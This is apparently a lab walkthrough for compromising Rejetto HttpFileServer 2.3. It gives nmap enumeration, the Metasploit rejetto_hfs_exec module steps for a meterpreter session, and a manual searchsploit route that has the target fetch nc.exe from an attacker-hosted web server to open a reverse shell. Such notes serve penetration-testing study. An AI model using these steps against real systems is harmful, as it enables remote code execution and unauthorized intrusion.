HttpFileServer httpd 2.3(Rejetto)

#Enumeration

nmap -sV -p 80 10.4.19.119
80/tcp open  http    HttpFileServer httpd 2.3

#Exploitation

search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, LHOST ,LPORT if necessary
exploit

After running this module you will get your meterpreter session

#Manual Exploitation

  • Use searchsploit to identify HttpFileServer httpd 2.3 vulnerabilities

  • Copy the exploit to the Desktop

Analyzing the Exploit

  • Read the exploit

    • You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). You may need to run it multiple times for success!

    • ip_addr - change to attacker Kali Linux IP

    • local_port - change to 1234

Execute the Exploit

  • Save and run the exploit

Last updated